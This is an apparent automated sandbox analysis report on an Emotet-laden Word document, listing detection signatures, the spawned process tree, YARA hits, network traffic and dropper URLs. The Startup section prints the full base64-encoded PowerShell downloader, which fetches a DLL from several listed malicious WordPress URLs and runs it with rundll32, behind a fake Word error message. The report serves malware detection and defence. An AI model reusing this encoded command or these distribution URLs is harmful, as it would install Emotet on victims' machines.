Play interactive tour

Edit tour

Analysis Report pack 2254794.doc

Overview

General Information

Sample Name:	pack 2254794.doc
Analysis ID:	336496
MD5:	1e1ec8dd9b25146cc2104be64d6f9bf0
SHA1:	d7253cfd0015dbb38c6e2bb602216468d83e4b4a
SHA256:	048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2288 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2616 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2548 cmdline: POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2848 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 960 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.1e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.210000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.170000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.190000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.170000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.210000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.240000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 10 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://fnjbq.com/wp-includes/rlR/	Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/	Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/	Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: petafilm.com	Virustotal: Detection: 6%			Perma Link
Source: http://petafilm.com	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: pack 2254794.doc	Virustotal: Detection: 30%			Perma Link
Source: pack 2254794.doc	ReversingLabs: Detection: 32%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002375AE CryptDecodeObjectEx,	11_2_002375AE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_0023109C FindFirstFileW,

11_2_0023109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: petafilm.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
